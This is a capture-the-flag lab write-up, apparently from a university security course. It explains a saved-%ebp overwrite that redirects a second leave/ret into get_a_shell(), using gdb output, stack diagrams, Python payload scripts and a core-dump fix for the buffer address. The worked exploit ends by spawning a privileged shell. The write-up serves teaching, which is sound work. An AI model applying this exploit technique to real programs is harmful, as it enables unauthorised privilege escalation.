# CANDL: unit02/bof-level5

To check the positions of variables on the stack accurately, let's take a look at the disassembly of `receive_input()`.

```
kxj190011@ctf-vm1.utdallas.edu:/home/kxj190011/unit2/bof-level5 $ gdb bof-level5
Reading symbols from bof-level5...(no debugging symbols found)...done.
pwndbg> disassemble receive_input
Dump of assembler code for function receive_input:
   0x08048558 <+0>:     push   %ebp
   0x08048559 <+1>:     mov    %esp,%ebp
   0x0804855b <+3>:     sub    $0x88,%esp
   0x08048561 <+9>:     sub    $0x4,%esp
   0x08048564 <+12>:    push   $0x84              <-- 3rd arg, at 0x8(%esp)
   0x08048569 <+17>:    lea    -0x80(%ebp),%eax   <-- 2nd arg is the address %ebp-0x80
   0x0804856c <+20>:    push   %eax               <-- 2nd arg, at 0x4(%esp)
   0x0804856d <+21>:    push   $0x0               <-- 1st arg, at (%esp)
   0x0804856f <+23>:    call   0x8048390 <read@plt>
   0x08048574 <+28>:    add    $0x10,%esp
   0x08048577 <+31>:    nop
   0x08048578 <+32>:    leave
   0x08048579 <+33>:    retl
End of assembler dump.
```

Try `man read` to see the function signature of *read()*:

```
NAME
       read - read from a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t read(int fd, void *buf, size_t count);

-> read(0, %ebp-0x80, 0x84)
```

From the assembly, the buffer is at %ebp-0x80, and the call lets us write 132 (0x84) bytes into it. We can draw the stack as follows:

```
[      buffer - %ebp-0x80      ][saved ebp][ret addr]
\__________128 bytes___________/\_4 bytes_/\_4bytes_/
\_______________132 bytes_______________/
```

We can overwrite the saved %ebp but not the return address. So the plan is: corrupt the saved %ebp that `receive_input()` restores at its `leave-retl`, and thereby control the return address that `run()`, the caller of `receive_input()`, uses at its own `leave-retl`.

Before doing this, let's recap leave and ret.

```
leave:
    mov %ebp, %esp   <-- set %esp to the same value as %ebp
    pop %ebp         <-- set %ebp to the value at (%esp), then add $4 to %esp

ret:
    pop %eip         <-- set the instruction pointer to the value at (%esp), then add $4 to %esp
```

And if we execute `leave-retl` twice:

* 1st round
```
leave:
    %esp = %ebp+4
    %ebp = %saved_ebp
ret:
    %eip = (%esp)
```

Now our %ebp is %saved_ebp, and we run `leave-retl` again.

* 2nd round
```
leave:
    %esp = %ebp+4 = %saved_ebp+4
    %ebp = (%ebp) = (%saved_ebp)
ret:
    %eip = (%esp) = (%saved_ebp+4)
```

(Please refer to the slide W2L2 for the animation of the stack operation if you cannot follow the change of %ebp and %esp.)

So, at the 2nd return, the CPU will use the value stored at the address %saved_ebp+4 as the return address (i.e., it jumps to the value stored at %saved_ebp+4).

Let's do some simple math.

* (%saved_ebp + 4) = return address
* %saved_ebp + 4 = the address that stores the return address
* %saved_ebp = the address that stores the return address - 4

And we can overwrite %saved_ebp. So what we need to do with this stack:

```
[      buffer - %ebp-0x80      ][saved %ebp][ret_addr in run()]
\__________128 bytes___________/\_4 bytes_/\______4bytes_____/
\_______________132 bytes_______________/
```

is to fill the 128 bytes of the buffer, and then fill the remaining 4 of the 132 bytes with [the address of the return address] - 4.

Then, where can we find the address of the return address? Let's first check where we want to return to (the get_a_shell() function).

```
pwndbg$ info functions
...
0x0804850b  get_a_shell
```

Yes, it is at 0x804850b. Then, would the value be 0x804850b-4 = 0x8048507? NOOOOOOOO. We need to know an address that *stores* 0x804850b. Is there such a place in the program already? No, definitely not.

Then, where can we find the address? To find that easily, let's think about the memory that we can control.

```
[      buffer - %ebp-0x80      ][saved %ebp][ret_addr in run()]
\__________128 bytes___________/\_4 bytes_/\______4bytes_____/
\_______________132 bytes_______________/
  --- OUR INPUTS (CONTROLLABLE) HERE ---
```

On the stack, we control the 132 bytes starting from the buffer. Although the last 4 bytes must hold a calculated value (for %saved_ebp), we can freely set the first 128 bytes of our input, so we can store 0x804850b there ourselves.
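
The two rounds of `leave-retl` described above can be replayed on a toy model. The sketch below is only an illustration, not the real process: memory is a Python dict, and the addresses `FRAME` and `FAKE` are made-up placeholders. The one thing it demonstrates is that after the second round, %eip comes from the word stored at (overwritten saved %ebp) + 4.

```python
# Toy model of a 32-bit stack: a dict mapping address -> 4-byte word.
# FRAME and FAKE are hypothetical addresses chosen for illustration only.

def leave(regs, mem):
    """leave = mov %ebp,%esp ; pop %ebp"""
    regs["esp"] = regs["ebp"]
    regs["ebp"] = mem[regs["esp"]]
    regs["esp"] += 4

def ret(regs, mem):
    """ret = pop %eip"""
    regs["eip"] = mem[regs["esp"]]
    regs["esp"] += 4

FRAME = 0x1000        # hypothetical %ebp inside receive_input()
FAKE = 0x0F80         # hypothetical value written over the saved %ebp
TARGET = 0x0804850B   # address of get_a_shell() from the text

mem = {
    FRAME: FAKE,            # overwritten saved %ebp
    FRAME + 4: 0x080485B5,  # untouched return address into run()
    FAKE: 0x78787878,       # popped into %ebp by the 2nd leave ("xxxx")
    FAKE + 4: TARGET,       # popped into %eip by the 2nd ret
}
regs = {"ebp": FRAME, "esp": FRAME - 0x88, "eip": 0}

leave(regs, mem); ret(regs, mem)   # 1st round, in receive_input()
first_eip = regs["eip"]
leave(regs, mem); ret(regs, mem)   # 2nd round, in run()
second_eip = regs["eip"]

print(hex(first_eip), hex(second_eip), hex(regs["ebp"]))
```

The first return still goes to the legitimate address in `run()`; only the second one is redirected, which is why the overflow works even though it never touches a return address directly.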
Then, let's get the address of our buffer. We can easily do this by setting a breakpoint before the leave instruction in receive_input, and checking the buffer's location by inspecting %ebp-0x80.

1. Open gdb and disassemble receive_input
```
pwndbg$ disas receive_input
Dump of assembler code for function receive_input:
   0x08048558 <+0>:     push   %ebp
   0x08048559 <+1>:     mov    %esp,%ebp
   0x0804855b <+3>:     sub    $0x88,%esp
   0x08048561 <+9>:     sub    $0x4,%esp
   0x08048564 <+12>:    push   $0x84
   0x08048569 <+17>:    lea    -0x80(%ebp),%eax
   0x0804856c <+20>:    push   %eax
   0x0804856d <+21>:    push   $0x0
   0x0804856f <+23>:    call   0x8048390 <read@plt>
   0x08048574 <+28>:    add    $0x10,%esp
   0x08048577 <+31>:    nop
   0x08048578 <+32>:    leave                     <-- LEAVE at +32
   0x08048579 <+33>:    ret
End of assembler dump.
```

2. Set a breakpoint at receive_input + 32
```
pwndbg$ b *receive_input+32
Breakpoint 1 at 0x8048578
```

3. Run
```
pwndbg$ r
```

In our tutorial example, I typed '1234' as the content of the buffer. Let's check where the buffer is:

```
pwndbg$ x/x $ebp-0x80
0xffffd578:     0x34333231
```

Yes, our buffer starts at the address 0xffffd578, and as we expect, the buffer contains 0x34333231, which is "1234" read as a little-endian word.

So if we set saved_ebp to 0xffffd578, we can make the CPU use values from our input to manage the stack (and we will change the return address by doing this!).

Then, what values do we want to set? First, we need to set saved_ebp to the address of our buffer, 0xffffd578.

```
  /--- pointed to by the saved %ebp, e.g., 0xffffd578
  v
[xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
                                  \_____saved_ebp____/
                                  little endian of 0xffffd578.
```

Then, we will fill the buffer as follows:

```
"xxxx" + "\x0b\x85\x04\x08" + "zzzz" * ((128/4)-2) + "\x78\xd5\xff\xff"
new_ebp  (return_address)     others (to fill 128 bytes) (start_of_buffer)
\__________________________128 bytes______________________/ \____saved_ebp____/
```

Then at the 2nd return, the CPU will take its return address from %saved_ebp+4, which is 0xffffd57c.
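
As a quick sanity check of the byte strings used above, the little-endian encodings can be produced with Python's standard `struct` module instead of being typed by hand. This is a small sketch; the constant names are only for illustration, while the two addresses are the ones observed in the text.

```python
import struct

BUF_ADDR = 0xFFFFD578     # buffer address observed in gdb above
GET_A_SHELL = 0x0804850B  # from `info functions`

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
saved_ebp_bytes = struct.pack("<I", BUF_ADDR)
ret_bytes = struct.pack("<I", GET_A_SHELL)

# The 2nd ret reads its return address from saved_ebp + 4.
ret_slot = BUF_ADDR + 4

print(saved_ebp_bytes, ret_bytes, hex(ret_slot))
```

The slot at `ret_slot` is exactly the second 4-byte word of the buffer, which is why RET is placed right after the first 4 filler bytes.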
Our buffer will look like this:

```
  /--- pointed to by the saved %ebp, e.g., 0xffffd578
  |    /------- 0xffffd57c, contains RET = 0x804850b = get_a_shell()
  v    v
[xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
\_4_/\_4_/\_4_/\_4_/\_4_/....\_4_/\________4_________/
\_____________128______________/ /
\___________________132_________________/
```

and RET will be 0x804850b (the address of get_a_shell()), in little endian: `\x0b\x85\x04\x08`.

Then the CPU will return to get_a_shell by the following steps:

1. Before the first leave in receive_input().
```
/----- pointed to by %esp
|                                                /---- pointed to by %ebp
v                                                v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
```

2. After the first leave
```
                                                                     /----- pointed to by %esp
               /---- pointed to by %ebp                              |
               v                                                     v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578
```

3. Return of receive_input() (before the 2nd leave in run())
```
                                                                                        /----- pointed to by %esp
               /---- pointed to by %ebp                                                 |
               v                                                                        v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578
```

4. 2nd leave in run()
* %ebp now holds "xxxx" (0x78787878), and %esp points to RET.
```
                    /----- pointed to by %esp
                    |
                    v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578
```

5. Return in run()
* pops [RET] into %eip, so the CPU jumps to the return address of our choice.
```
                         /----- pointed to by %esp
                         |
                         v
[argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()]
               ^
               |
               \--- address 0xffffd578
```

Then the CPU will run get_a_shell(), pointed to by RET!

To make that input, let's create a python script.
```python
#!/usr/bin/env python
# Bytes literals and integer division keep this working on Python 2 and 3.
with open('input.txt', 'wb') as f:
    # fake %ebp + address of get_a_shell() + padding + address of the buffer
    f.write(b"xxxx" + b"\x0b\x85\x04\x08" + b"aaaa" * (128 // 4 - 2) + b"\x78\xd5\xff\xff")
```

If you run the script, you will get input.txt as:

```
$ xxd input.txt
00000000: 7878 7878 0b85 0408 6161 6161 6161 6161  xxxx....aaaaaaaa
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000050: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000060: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000070: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000080: 78d5 ffff                                x...
```

Let's run that in gdb, with a breakpoint at the first leave.

```
pwndbg$ b *receive_input +32
Note: breakpoint 1 also set at pc 0x8048578.
Breakpoint 2 at 0x8048578
pwndbg$ r < input.txt
```

Let's do 'ni'. After the first leave, you can observe:

```
EBP: 0xffffd578 --> ("xxxx\v\205\004\b", 'a' , (seems buffer)
ESP: 0xffffd5fc --> 0x80485b5 (: nop)
```

Let's do three more 'ni's, until we have executed the 2nd leave in run(). Now,

```
EBP: 0x78787878 ('xxxx')
ESP: 0xffffd57c --> 0x804850b (: push %ebp)
```

ESP is pointing to an address that contains the start of get_a_shell(), so if we execute 'ret', it will run get_a_shell()! Press 'c' to continue!

```
pwndbg$ c
Continuing.
Spawning a privileged shell
process 7252 is executing new program: /bin/bash
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
Error in re-setting breakpoint 1: No symbol "receive_input" in current context.
Error in re-setting breakpoint 2: No symbol "receive_input" in current context.
[Inferior 1 (process 7252) exited normally]
```

Yes, we can execute the shell...

Then let's try the following command outside gdb (and also press the enter key a few times):

```
$ (cat input.txt; cat) | ./bof-level5
Now we have a buffer overflow vulnerability, but the vulnerability cannot reach to the return address...
Can you exploit this program?
Segmentation fault (core dumped)
```

Uh oh, our exploit does not work. Why? It's because the environment inside gdb differs from the environment of a program running outside gdb, so the stack (and our buffer) sits at a different address. We need to account for that difference, and it can easily be observed in the core file, which is generated along with that "(core dumped)" message.

A core file contains a snapshot of the memory space of a program at the moment it crashed. So we can find the exact address in our real environment by inspecting the core file.

Let's open the core file using 'gdb'.

```
$ gdb --core=core
[New LWP 7261]
warning: Unexpected size of section `.reg-xstate/7261' in core file.
Core was generated by `./bof-level5'.
Program terminated with signal SIGSEGV, Segmentation fault.
warning: Unexpected size of section `.reg-xstate/7261' in core file.
#0  0x61616161 in ?? ()
```

It seems that the program faulted at the address 0x61616161, and 0x61616161 is "aaaa", which is part of our input (we wrote "xxxx" + the address of get_a_shell() + "aaaa" padding). In other words, the 2nd ret popped its return address from 0xffffd57c, but outside gdb that address falls in the middle of our padding rather than on RET.

Let's check our stack.
```
pwndbg$ x/100xw $esp
0xffffd580:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd590:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd5a0:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd5b0:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd5c0:     0x61616161      0x61616161      0xffffd578      0x080485b5   <-- 0xffffd578 is the address that we typed
0xffffd5d0:     0x00000001      0xffffd694      0xffffd5e8      0x080485ce
0xffffd5e0:     0xf7fb43dc      0xffffd600      0x00000000      0xf7e1a637
0xffffd5f0:     0xf7fb4000      0xf7fb4000      0x00000000      0xf7e1a637
0xffffd600:     0x00000001      0xffffd694      0xffffd69c      0x00000000
0xffffd610:     0x00000000      0x00000000      0xf7fb4000      0xf7ffdc04
0xffffd620:     0xf7ffd000      0x00000000      0xf7fb4000      0xf7fb4000
0xffffd630:     0x00000000      0xdecab371      0xe22d5d61      0x00000000
0xffffd640:     0x00000000      0x00000000      0x00000001      0x08048410
0xffffd650:     0x00000000      0xf7fee010      0xf7fe8880      0xf7ffd000
0xffffd660:     0x00000001      0x08048410      0x00000000      0x08048431
0xffffd670:     0x080485b8      0x00000001      0xffffd694      0x080485e0
0xffffd680:     0x08048640      0xf7fe8880      0xffffd68c      0xf7ffd918
0xffffd690:     0x00000001      0xffffd7c8      0x00000000      0xffffd7d5
0xffffd6a0:     0xffffd7e5      0xffffd7f0      0xffffd7fb      0xffffd80e
0xffffd6b0:     0xffffd81b      0xffffdda3      0xffffddb6      0xffffddc4
0xffffd6c0:     0xffffddd2      0xffffdde9      0xffffde5f      0xffffde88
0xffffd6d0:     0xffffde99      0xffffdf06      0xffffdf0e      0xffffdf2b
0xffffd6e0:     0xffffdf44      0xffffdf54      0xffffdf74      0xffffdf82
0xffffd6f0:     0xffffdf99      0xffffdfbb      0xffffdfca      0x00000000
0xffffd700:     0x00000020      0xf7fd7fe0      0x00000021      0xf7fd7000
```

Right now, our focus is to find the start address of the buffer. Because we cannot see the starting point ("xxxx", which is 0x78787878) in this dump, let's start printing from a lower address, say $esp-0x100.
```
pwndbg$ x/100xw $esp-0x100
0xffffd480:     0xffffd540      0xf7fe2b4b      0x0804820c      0xffffd4f8
0xffffd490:     0xf7ffda74      0x00000001      0xf7fd34a0      0x00000001
0xffffd4a0:     0xf7fe2a70      0x080481dc      0x00000001      0xf7ffd918
0xffffd4b0:     0x0804a00c      0xf7fe78a2      0xf7ffdad0      0xf7fd34a0
0xffffd4c0:     0x00000001      0x00000001      0x00000000      0xf7e6b0b1
0xffffd4d0:     0x00000001      0x0804b008      0x0000001e      0x08048295
0xffffd4e0:     0xf7ffd000      0x0804826c      0xf7e0edc8      0xf7fb4d60
0xffffd4f0:     0x0000000a      0xf7e09b08      0xffffd5b8      0xf7e6a3e4
0xffffd500:     0xf7fe77eb      0x00000000      0xf7fb4000      0xf7fb4000
0xffffd510:     0xffffd5c8      0xf7fee010      0xffffd5c8      0x00000084
0xffffd520:     0xffffd548      0xf7ed7b23      0x00000000      0x08048574
0xffffd530:     0x00000000      0xffffd548      0x00000084      0xf7e6c47b
0xffffd540:     0xf7fb4d60      0x0804b008      0x78787878      0x0804850b   <-- here is our buffer! 0x78787878!!!
0xffffd550:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd560:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd570:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd580:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd590:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd5a0:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd5b0:     0x61616161      0x61616161      0x61616161      0x61616161
0xffffd5c0:     0x61616161      0x61616161      0xffffd578      0x080485b5
0xffffd5d0:     0x00000001      0xffffd694      0xffffd5e8      0x080485ce
0xffffd5e0:     0xf7fb43dc      0xffffd600      0x00000000      0xf7e1a637
0xffffd5f0:     0xf7fb4000      0xf7fb4000      0x00000000      0xf7e1a637
0xffffd600:     0x00000001      0xffffd694      0xffffd69c      0x00000000
```

See the line below:

```
0xffffd540:     0xf7fb4d60      0x0804b008      0x78787878      0x0804850b   <-- here is our buffer! 0x78787878!!!
```

Our buffer (0x78787878) starts in the middle of the line, so we can infer that its address is 0xffffd540 + 8 (two 4-byte integers lie between the start of the line and 0x78787878), so it is 0xffffd548.

Let's adjust our address in the script then.
```python
#!/usr/bin/env python
# Same payload as before; only the last 4 bytes (buffer address) changed.
with open('input.txt', 'wb') as f:
    f.write(b"xxxx" + b"\x0b\x85\x04\x08" + b"aaaa" * (128 // 4 - 2) + b"\x48\xd5\xff\xff")
```

Running this script and printing input.txt gives:

```
red9057@blue9057-vm-ctf1 : ~/unit2/bof-level5
$ xxd input.txt
00000000: 7878 7878 0b85 0408 6161 6161 6161 6161  xxxx....aaaaaaaa
00000010: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000030: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000040: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000050: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000060: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000070: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
00000080: 48d5 ffff                                H...
```

Yes, now the saved %ebp points to 0xffffd548.

And you can get the flag by running the following commands:

```
red9057@blue9057-vm-ctf1 : ~/unit2/bof-level5
$ (cat input.txt;cat) | ./bof-level5
Now we have a buffer overflow vulnerability, but the vulnerability cannot reach to the return address...
Can you exploit this program?
Spawning a privileged shell
$ id
uid=1006(red9057) gid=50205(unit2-level5-ok) groups=50205(unit2-level5-ok),1006(red9057)
$ cat flag
candl{???SCRAMBLED???}
```
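
Since the buffer address had to be recomputed by hand from the core dump, the two manual steps (locating 0x78787878 in a dump line, then rebuilding the payload) can be sketched as small helpers. The function names `find_word` and `build_payload` are hypothetical and not part of the challenge; the dump line and addresses are the ones shown in this write-up.

```python
import struct

def find_word(dump_line, word):
    """Return the address of `word` in one line of gdb `x/xw` output, or None."""
    addr_text, _, rest = dump_line.partition(":")
    base = int(addr_text, 16)
    for i, tok in enumerate(rest.split()):
        if not tok.startswith("0x"):
            break                      # stop at any trailing annotation
        if int(tok, 16) == word:
            return base + 4 * i        # each column is one 4-byte word
    return None

def build_payload(buf_addr, target, size=128):
    """Fake %ebp, target address, padding up to `size`, then buf_addr."""
    body = b"xxxx" + struct.pack("<I", target)
    body += b"a" * (size - len(body))
    return body + struct.pack("<I", buf_addr)

line = "0xffffd540: 0xf7fb4d60 0x0804b008 0x78787878 0x0804850b"
buf_addr = find_word(line, 0x78787878)
payload = build_payload(buf_addr, 0x0804850B)
print(hex(buf_addr), len(payload))
```

Writing `payload` to input.txt in binary mode should give the same 132 bytes as the adjusted script above; if the stack moves again (for example, under a different set of environment variables), only the dump line needs to change.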